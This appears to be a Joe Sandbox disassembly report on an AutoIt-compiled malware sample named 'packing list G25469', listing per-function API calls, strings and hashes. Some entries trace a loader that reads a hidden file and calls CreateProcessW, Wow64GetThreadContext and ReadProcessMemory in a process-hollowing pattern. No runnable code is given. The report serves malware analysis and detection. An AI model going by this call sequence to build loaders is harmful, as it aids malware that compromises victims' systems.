                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01349E51
                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0134A077
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106729972.0000000001347000.00000040.00000020.00020000.00000000.sdmp, Offset: 01347000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1347000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CreateFileFreeVirtual
                                                  • String ID:
                                                  • API String ID: 204039940-0
                                                  • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                  • Instruction ID: cd300e31de73f881814218475acae673fdfc88bdedbfefa17d5e2d5c22eca7ed
                                                  • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                  • Instruction Fuzzy Hash: 6FA12A70E00209EBDB14CFA4C894BEEBBB5FF48309F108559E205BB280C775AA85CF54

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1130 b349fb-b34a25 call b3bcce RegOpenKeyExW 1133 ba41cc-ba41e3 RegQueryValueExW 1130->1133 1134 b34a2b-b34a2f 1130->1134 1135 ba4246-ba424f RegCloseKey 1133->1135 1136 ba41e5-ba4222 call b4f4ea call b347b7 RegQueryValueExW 1133->1136 1141 ba423d-ba4245 call b347e2 1136->1141 1142 ba4224-ba423b call b36a63 1136->1142 1141->1135 1142->1141
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00B34A1D
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00BA41DB
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00BA421A
                                                  • RegCloseKey.ADVAPI32(?), ref: 00BA4249
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: QueryValue$CloseOpen
                                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                                  • API String ID: 1586453840-614718249
                                                  • Opcode ID: 036e3b24de7875f5cc33df1c5a9d39bd794b050c422a390c772fd1b9473d461b
                                                  • Instruction ID: 3aff2615cca43992112868f09686e2307a6d463e977a794eab988ad498e11180
                                                  • Opcode Fuzzy Hash: 036e3b24de7875f5cc33df1c5a9d39bd794b050c422a390c772fd1b9473d461b
                                                  • Instruction Fuzzy Hash: 37113075600109BFDB04ABA4CD96EBF7BECEF05344F1040A9B506D7191EBB0AE429750

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1157 b336b8-b33728 CreateWindowExW * 2 ShowWindow * 2
                                                  APIs
                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B336E6
                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B33707
                                                  • ShowWindow.USER32(00000000,?,?,?,?,00B33AA3,?), ref: 00B3371B
                                                  • ShowWindow.USER32(00000000,?,?,?,?,00B33AA3,?), ref: 00B33724
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Window$CreateShow
                                                  • String ID: AutoIt v3$edit
                                                  • API String ID: 1584632944-3779509399
                                                  • Opcode ID: cc747e028eeb0f8255bce03c54f0ebbc731dbff4fd9ac215e3410608dc3a2d7e
                                                  • Instruction ID: 63796cd8a9c076bc7a6fcf97a81fad46474c2c46047a3bb4f8a50d24aa661568
                                                  • Opcode Fuzzy Hash: cc747e028eeb0f8255bce03c54f0ebbc731dbff4fd9ac215e3410608dc3a2d7e
                                                  • Instruction Fuzzy Hash: 47F0DA755402D0BAE731976BAC08E772E7ED7C6F20B00496EBA04A31B0DD750895DAB0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1262 1349b30-1349c76 call 1347780 call 1349a20 CreateFileW 1269 1349c7d-1349c8d 1262->1269 1270 1349c78 1262->1270 1273 1349c94-1349cae VirtualAlloc 1269->1273 1274 1349c8f 1269->1274 1271 1349d2d-1349d32 1270->1271 1275 1349cb0 1273->1275 1276 1349cb2-1349cc9 ReadFile 1273->1276 1274->1271 1275->1271 1277 1349ccd-1349d07 call 1349a60 call 1348a20 1276->1277 1278 1349ccb 1276->1278 1283 1349d23-1349d2b ExitProcess 1277->1283 1284 1349d09-1349d1e call 1349ab0 1277->1284 1278->1271 1283->1271 1284->1283
                                                  APIs
                                                    • Part of subcall function 01349A20: Sleep.KERNELBASE(000001F4), ref: 01349A31
                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01349C6C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106729972.0000000001347000.00000040.00000020.00020000.00000000.sdmp, Offset: 01347000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1347000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CreateFileSleep
                                                  • String ID: QF38TL3NWA696QEI
                                                  • API String ID: 2694422964-1732309548
                                                  • Opcode ID: 81f35a707defbe33cedade6818dca1c8e59d6984c68c4073267e76ddc149a087
                                                  • Instruction ID: 5fec75d52cc7d5a61ad4dfc6578fae21aa63d36dbacacdb2b8c9ffb5bbb74360
                                                  • Opcode Fuzzy Hash: 81f35a707defbe33cedade6818dca1c8e59d6984c68c4073267e76ddc149a087
                                                  • Instruction Fuzzy Hash: 2B518030D14248EBEF11DBA4D854BEFBBB9AF18704F004199E249BB2C0D7B91B45CBA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1286 b351af-b351c5 1287 b352a2-b352a6 1286->1287 1288 b351cb-b351e0 call b36b0f 1286->1288 1291 b351e6-b35206 call b36a63 1288->1291 1292 ba3ca1-ba3cb0 LoadStringW 1288->1292 1295 ba3cbb-ba3cd3 call b3510d call b34db1 1291->1295 1296 b3520c-b35210 1291->1296 1292->1295 1305 b35220-b3529d call b50d50 call b350e6 call b50d23 Shell_NotifyIconW call b3cb37 1295->1305 1308 ba3cd9-ba3cf7 call b3518c call b34db1 call b3518c 1295->1308 1298 b352a7-b352b0 call b36eed 1296->1298 1299 b35216-b3521b call b3510d 1296->1299 1298->1305 1299->1305 1305->1287 1308->1305
                                                  APIs
                                                  • _memset.LIBCMT ref: 00B3522F
                                                  • _wcscpy.LIBCMT ref: 00B35283
                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B35293
                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00BA3CB0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                  • String ID: Line:
                                                  • API String ID: 1053898822-1585850449
                                                  • Opcode ID: 5f72b31b4623b5671fa45e9816005734bc51c489fa07a55593a7e0e63fa4c19b
                                                  • Instruction ID: fa3262bb6155d0a357b650e7f1f2da2f15db9bbf7075fe220883b05763c7a670
                                                  • Opcode Fuzzy Hash: 5f72b31b4623b5671fa45e9816005734bc51c489fa07a55593a7e0e63fa4c19b
                                                  • Instruction Fuzzy Hash: 3E317C71408744AFD331EB64DC46FEB77E8EB44310F20499AF589A31A1EF74A648CB96
                                                  APIs
                                                    • Part of subcall function 00B341A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00B339FE,?,00000001), ref: 00B341DB
                                                  • _free.LIBCMT ref: 00BA36B7
                                                  • _free.LIBCMT ref: 00BA36FE
                                                    • Part of subcall function 00B3C833: __wsplitpath.LIBCMT ref: 00B3C93E
                                                    • Part of subcall function 00B3C833: _wcscpy.LIBCMT ref: 00B3C953
                                                    • Part of subcall function 00B3C833: _wcscat.LIBCMT ref: 00B3C968
                                                    • Part of subcall function 00B3C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00B3C978
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                  • API String ID: 805182592-1757145024
                                                  • Opcode ID: 7cb29f28082ecabfc0191e489c85b184b13688b1ac5c30769343e40013c4ea54
                                                  • Instruction ID: 058471ef913ea7b8c9ce896dfdd43a741b03a677232c8eaf30fe2f1e4652342b
                                                  • Opcode Fuzzy Hash: 7cb29f28082ecabfc0191e489c85b184b13688b1ac5c30769343e40013c4ea54
                                                  • Instruction Fuzzy Hash: E7916171914219AFCF04EFA8CC919EEBBF4FF19710F1444A9F416AB291DB34AA45CB50
                                                  APIs
                                                    • Part of subcall function 00B35374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00BF1148,?,00B361FF,?,00000000,00000001,00000000), ref: 00B35392
                                                    • Part of subcall function 00B349FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00B34A1D
                                                  • _wcscat.LIBCMT ref: 00BA2D80
                                                  • _wcscat.LIBCMT ref: 00BA2DB5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: _wcscat$FileModuleNameOpen
                                                  • String ID: \$\Include\
                                                  • API String ID: 3592542968-2640467822
                                                  • Opcode ID: 3717dabf8dad983c8663fa0deda5a32bc87de28413e881fd1751409fdc232df4
                                                  • Instruction ID: b49cb7d4da57d7ba3ce8e5402aef16bf08f9fb8a5166290fe367b940a1e0ed6c
                                                  • Opcode Fuzzy Hash: 3717dabf8dad983c8663fa0deda5a32bc87de28413e881fd1751409fdc232df4
                                                  • Instruction Fuzzy Hash: FE5154764143409FC714EF59D9829AAB7F8FF59300F5045AEF685A3261EF309B08CB5A
                                                  APIs
                                                  • __getstream.LIBCMT ref: 00B534FE
                                                    • Part of subcall function 00B57C0E: __getptd_noexit.LIBCMT ref: 00B57C0E
                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00B53539
                                                  • __wopenfile.LIBCMT ref: 00B53549
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                  • String ID: <G
                                                  • API String ID: 1820251861-2138716496
                                                  • Opcode ID: f0137308e296dd4fbfce509567dd7f3e91a60e8a158c736efbf9ed5738eff70b
                                                  • Instruction ID: a36428ac107e811bce29b15f9b7c5fcfb11586482023a6ac624cca12f4d76fb0
                                                  • Opcode Fuzzy Hash: f0137308e296dd4fbfce509567dd7f3e91a60e8a158c736efbf9ed5738eff70b
                                                  • Instruction Fuzzy Hash: D611E770A002069BEB12BF709C4276E37E4EF15B92B1488E5EC15C7381FB34CB1997A1
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00B4D28B,SwapMouseButtons,00000004,?), ref: 00B4D2BC
                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00B4D28B,SwapMouseButtons,00000004,?,?,?,?,00B4C865), ref: 00B4D2DD
                                                  • RegCloseKey.KERNELBASE(00000000,?,?,00B4D28B,SwapMouseButtons,00000004,?,?,?,?,00B4C865), ref: 00B4D2FF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: Control Panel\Mouse
                                                  • API String ID: 3677997916-824357125
                                                  • Opcode ID: 79b41222d284faf320fddf0fb91b6ce5e5dfac79d137cf3238d774331b7a33fb
                                                  • Instruction ID: 760102028e73cc1ede92400b49c2180298828f748e86e8b4afbff0d921f5fc48
                                                  • Opcode Fuzzy Hash: 79b41222d284faf320fddf0fb91b6ce5e5dfac79d137cf3238d774331b7a33fb
                                                  • Instruction Fuzzy Hash: 76113975611209BFDB219FA4CC84EAF7BF8EF44744F1049A9E805D7110E671EE41AB64
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 013491DB
                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01349271
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01349293
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106729972.0000000001347000.00000040.00000020.00020000.00000000.sdmp, Offset: 01347000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1347000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                  • String ID:
                                                  • API String ID: 2438371351-0
                                                  • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                  • Instruction ID: 1ab0625c8404bbd239215d97158d1876d306786f11a7069aca1559caa5309675
                                                  • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                  • Instruction Fuzzy Hash: F562FC30A14258DBEB24CFA4C850BDEB776EF58304F1091A9D10DEB394E776AE81CB59
                                                  APIs
                                                    • Part of subcall function 00B34517: _fseek.LIBCMT ref: 00B3452F
                                                    • Part of subcall function 00B7C56D: _wcscmp.LIBCMT ref: 00B7C65D
                                                    • Part of subcall function 00B7C56D: _wcscmp.LIBCMT ref: 00B7C670
                                                  • _free.LIBCMT ref: 00B7C4DD
                                                  • _free.LIBCMT ref: 00B7C4E4
                                                  • _free.LIBCMT ref: 00B7C54F
                                                    • Part of subcall function 00B51C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00B57A85), ref: 00B51CB1
                                                    • Part of subcall function 00B51C9D: GetLastError.KERNEL32(00000000,?,00B57A85), ref: 00B51CC3
                                                  • _free.LIBCMT ref: 00B7C557
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                  • String ID:
                                                  • API String ID: 1552873950-0
                                                  • Opcode ID: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
                                                  • Instruction ID: 81b490bbed753488e0c857a071fc8bce95927b20152211bf107a161ca2080016
                                                  • Opcode Fuzzy Hash: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
                                                  • Instruction Fuzzy Hash: F1515CB1904218AFDF149F68DC81BADBBB9EF48300F1044EEF61DA7241DB716A808F58
                                                  APIs
                                                  • _memset.LIBCMT ref: 00B4EBB2
                                                    • Part of subcall function 00B351AF: _memset.LIBCMT ref: 00B3522F
                                                    • Part of subcall function 00B351AF: _wcscpy.LIBCMT ref: 00B35283
                                                    • Part of subcall function 00B351AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B35293
                                                  • KillTimer.USER32(?,00000001,?,?), ref: 00B4EC07
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B4EC16
                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BA3C88
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                  • String ID:
                                                  • API String ID: 1378193009-0
                                                  • Opcode ID: 17234255014599eb974c51ac204f5943b5055b78bc9ab82750d642af802a3f69
                                                  • Instruction ID: a1bea19e9d34e1dafff432c1a8e58c5da83692ae9e3166560c04410ca6dc7fa6
                                                  • Opcode Fuzzy Hash: 17234255014599eb974c51ac204f5943b5055b78bc9ab82750d642af802a3f69
                                                  • Instruction Fuzzy Hash: 5821DA709087849FE73297288C95BE7BBECEB02714F0404DDF69A57242D7746B84CB51
                                                  APIs
                                                  • _memset.LIBCMT ref: 00BA3725
                                                  • GetOpenFileNameW.COMDLG32 ref: 00BA376F
                                                    • Part of subcall function 00B3660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B353B1,?,?,00B361FF,?,00000000,00000001,00000000), ref: 00B3662F
                                                    • Part of subcall function 00B340A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B340C6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                  • String ID: X
                                                  • API String ID: 3777226403-3081909835
                                                  • Opcode ID: 17c30b1e1fd93ee7168f2100e64d5985fc570e973349279df830af290a12ad73
                                                  • Instruction ID: 5f92cdfa899a38fb5de35f10e64a9b7671efe805cbbaf058a08bb90b01cf6a1d
                                                  • Opcode Fuzzy Hash: 17c30b1e1fd93ee7168f2100e64d5985fc570e973349279df830af290a12ad73
                                                  • Instruction Fuzzy Hash: 3F21D571A10188AFCB01DF98C845BEEBBF89F49704F108099E404B7241DFB46A898F65
                                                  APIs
                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00B7C72F
                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00B7C746
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Temp$FileNamePath
                                                  • String ID: aut
                                                  • API String ID: 3285503233-3010740371
                                                  • Opcode ID: 666357a8167fa03ca9e6f0f9350d6f6718064c7f2ca7ea7a5153bb493e17f7b1
                                                  • Instruction ID: d0023952eac32549333d0303f771960a109c3b2e62b8b5a03a73edf7018cd30d
                                                  • Opcode Fuzzy Hash: 666357a8167fa03ca9e6f0f9350d6f6718064c7f2ca7ea7a5153bb493e17f7b1
                                                  • Instruction Fuzzy Hash: 52D05E7550030EAFDB10AB90DC0EF8AB7AC9B00704F0002A07651A60B2EBF4E6998B54
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 085aa1a17a2b646722aad3843777fc2bbaddeac64bc6f5f42f2c40db2e35144d
                                                  • Instruction ID: e642418d75e16bba01fab3a9ffbda844b8b9c911b2e46684e9ba53e4b60c21b5
                                                  • Opcode Fuzzy Hash: 085aa1a17a2b646722aad3843777fc2bbaddeac64bc6f5f42f2c40db2e35144d
                                                  • Instruction Fuzzy Hash: 45F14B716043029FC710EF28C485B6AB7E5FF88314F1489ADF9999B292DB70E945CF82
                                                  APIs
                                                  • _memset.LIBCMT ref: 00B35022
                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B350CB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell__memset
                                                  • String ID:
                                                  • API String ID: 928536360-0
                                                  • Opcode ID: 34838966d2f019b9ff2679a4eafe41ec166bf23bfeea6e37686c344aecdb6504
                                                  • Instruction ID: 4e7882f86edbc168be6a794158e706398a38ec2e3e06a06a491095bbd233aba3
                                                  • Opcode Fuzzy Hash: 34838966d2f019b9ff2679a4eafe41ec166bf23bfeea6e37686c344aecdb6504
                                                  • Instruction Fuzzy Hash: F9316BB0504701DFC725DF28D8856ABBBE8FF49304F100D6EF59A93251EB72A948CB92
